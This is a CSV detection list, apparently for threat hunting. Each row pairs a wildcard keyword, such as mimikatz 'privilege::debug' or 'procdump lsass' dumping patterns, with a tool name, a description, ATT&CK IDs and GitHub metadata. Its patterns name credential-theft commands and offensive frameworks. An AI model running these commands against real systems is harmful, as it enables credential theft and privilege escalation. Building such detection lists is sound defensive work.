-*PrivFu-master*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/daem0nc0re/PrivFu/,1,1,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z -*privilege::backup*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*privilege::debug*,offensive_tool_keyword,mimikatz,mimikatz exploitation command,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*privilege::debug*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*privilege::driver*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*privilege::id*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*privilege::name*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*privilege::restore*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*privilege::security*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*privilege::sysenv*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*privilege::tcb*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*Privileged Accounts - Layers Analysis.txt*,offensive_tool_keyword,ACLight,A tool for advanced discovery of Privileged Accounts - including Shadow Admins.,T1087 - T1003 - T1208,TA0001 - TA0006 - TA0008,N/A,N/A,AD Enumeration,https://github.com/cyberark/ACLight,1,0,N/A,7,8,730,150,2019-09-09T06:48:45Z,2017-05-17T09:29:41Z -*Privileged Accounts Permissions - Final Report.csv*,offensive_tool_keyword,ACLight,A tool for advanced discovery of Privileged Accounts - including Shadow Admins.,T1087 - T1003 - T1208,TA0001 - TA0006 - TA0008,N/A,N/A,AD Enumeration,https://github.com/cyberark/ACLight,1,0,N/A,7,8,730,150,2019-09-09T06:48:45Z,2017-05-17T09:29:41Z -*Privileged Accounts Permissions - Irregular Accounts.csv*,offensive_tool_keyword,ACLight,A tool for advanced discovery of Privileged Accounts - including Shadow Admins.,T1087 - T1003 - T1208,TA0001 - TA0006 - TA0008,N/A,N/A,AD Enumeration,https://github.com/cyberark/ACLight,1,0,N/A,7,8,730,150,2019-09-09T06:48:45Z,2017-05-17T09:29:41Z -*PrivilegeEscalation*,offensive_tool_keyword,PrivilegeEscalation,This program is a very short batch file which allows you to run anything with admin rights without prompting user could be related to other tools using privsec methods,T1548.001 - T1548.003 - T1548.008,TA0004 - TA0002,N/A,N/A,Exploitation tools,https://github.com/LouisVallat/PrivilegeEscalation,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*PrivilegeEscalation_BypassUserAccountControl_Windows.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*PrivilegeEscalation_EnumPatchExample_Windows.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*PrivilegeEscalation_ExploitationForPrivilegeEscalation_CVE_2021_40449.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*PrivilegeEscalation_ExploitationForPrivilegeEscalation_EfsPotato.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*PrivilegeEscalation_ExploitationForPrivilegeEscalation_SweetPotato.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*PrivilegeEscalation_ExploitationForPrivilegeEscalation_Windows.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*PrivilegeEscalation_ProcessInjection_Getsystem.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Privileger.cpp*,offensive_tool_keyword,Privileger,Privileger is a tool to work with Windows Privileges,T1548.002,TA0004 ,N/A,N/A,Privilege Escalation,https://github.com/MzHmO/Privileger,1,1,N/A,8,2,117,25,2023-02-07T07:28:40Z,2023-01-31T11:24:37Z -*Privileger.exe*,offensive_tool_keyword,Privileger,Privileger is a tool to work with Windows Privileges,T1548.002,TA0004 ,N/A,N/A,Privilege Escalation,https://github.com/MzHmO/Privileger,1,1,N/A,8,2,117,25,2023-02-07T07:28:40Z,2023-01-31T11:24:37Z -*Privileger-main.*,offensive_tool_keyword,Privileger,Privileger is a tool to work with Windows Privileges,T1548.002,TA0004 ,N/A,N/A,Privilege Escalation,https://github.com/MzHmO/Privileger,1,1,N/A,8,2,117,25,2023-02-07T07:28:40Z,2023-01-31T11:24:37Z -*Privilegerx64.exe*,offensive_tool_keyword,Privileger,Privileger is a tool to work with Windows Privileges,T1548.002,TA0004 ,N/A,N/A,Privilege Escalation,https://github.com/MzHmO/Privileger,1,1,N/A,8,2,117,25,2023-02-07T07:28:40Z,2023-01-31T11:24:37Z -*Privilegerx86.exe*,offensive_tool_keyword,Privileger,Privileger is a tool to work with Windows Privileges,T1548.002,TA0004 ,N/A,N/A,Privilege Escalation,https://github.com/MzHmO/Privileger,1,1,N/A,8,2,117,25,2023-02-07T07:28:40Z,2023-01-31T11:24:37Z -*PrivKit32*,offensive_tool_keyword,PrivKit,PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.,T1548.002 - T1059.003 - T1027.002,TA0005,N/A,N/A,Privilege Escalation,https://github.com/mertdas/PrivKit,1,1,N/A,9,3,265,35,2023-03-23T09:50:09Z,2023-03-20T04:19:40Z -*PrivKit-main*,offensive_tool_keyword,PrivKit,PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.,T1548.002 - T1059.003 - T1027.002,TA0005,N/A,N/A,Privilege Escalation,https://github.com/mertdas/PrivKit,1,1,N/A,9,3,265,35,2023-03-23T09:50:09Z,2023-03-20T04:19:40Z -*Probable-Wordlists*,offensive_tool_keyword,Probable-Wordlists,Password wordlists,T1110 - T1114,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/berzerk0/Probable-Wordlists,1,1,N/A,N/A,10,8139,1614,2021-12-21T18:14:59Z,2017-04-16T17:08:27Z -*Probable-Wordlists*,offensive_tool_keyword,Probable-Wordlists,real password lists,T1110 - T1114,TA0006 - TA0007,N/A,N/A,Exploitation tools,https://github.com/berzerk0/Probable-Wordlists,1,1,N/A,N/A,10,8139,1614,2021-12-21T18:14:59Z,2017-04-16T17:08:27Z -*procdump* lsass.exe *.dmp*,offensive_tool_keyword,onex,C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps,T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/cube0x0/MiniDump,1,0,N/A,N/A,3,263,48,2021-10-13T18:00:46Z,2021-08-14T12:26:16Z -*procdump*lsass*,greyware_tool_keyword,Procdump,dump lsass process with procdump,T1003.001,TA0006,N/A,N/A,Credential Access,https://learn.microsoft.com/en-us/sysinternals/downloads/procdump,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*procdump.exe*lsass*,offensive_tool_keyword,AD exploitation cheat sheet,Dump LSASS memory through a process snapshot (-r) avoiding interacting with it directly,T1003.001,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*procdump/dump_windows.go*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*procdump_dump*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*procdump_embedded*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,1,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*procdump_path=*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,0,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*process::exports*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*process::imports*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*process::list*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*process::resume*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*process::run*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*process::runp*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*process::start*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*process::stop*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*process::suspend*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*process_herpaderping*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*process_imports.cna*,offensive_tool_keyword,cobaltstrike,A BOF to parse the imports of a provided PE-file. optionally extracting symbols on a per-dll basis.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/DLL_Imports_BOF,1,1,N/A,10,10,80,10,2021-10-28T18:07:09Z,2021-10-27T21:02:44Z -*process_imports.x64*,offensive_tool_keyword,cobaltstrike,A BOF to parse the imports of a provided PE-file. optionally extracting symbols on a per-dll basis.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 